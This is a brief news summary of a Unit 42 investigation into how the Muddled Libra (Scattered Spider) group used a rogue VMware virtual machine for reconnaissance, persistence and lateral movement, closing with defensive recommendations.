ACCORDING to Unit 42, during a September 2025 incident response investigation, the cybercrime group Muddled Libra (also known as Scattered Spider, UNC3944) used a rogue virtual machine uncovered on a targeted environment to shed light on its operational playbook.
The investigation found that the VM was created after the group gained unauthorized access to the target’s VMware vSphere environment and was used to conduct early attack activity, including reconnaissance, tool download, and establishing persistence via a C2 channel. Attacker activity also involved using stolen certificates to forge tickets, copying files from the rogue VM to the domain controller, and interacting with the target’s Snowflake infrastructure.
The analysis details rapid techniques such as creating a beachhead VM, logging in with a new local account, deploying the Chisel SSH tunnel, and subsequent lateral movement across multiple compromised accounts, aided by various Open-Source tools and Microsoft Sysinternals utilities. Defences highlighted include strong identity security, strict access controls, and ongoing monitoring for living-off-the-land behaviours.
The piece presents a rare window into Muddled Libra’s TTPs through forensic artifacts and logs from the rogue VM, underscoring the value of visibility and disciplined access management in defending cloud and on‑prem environments.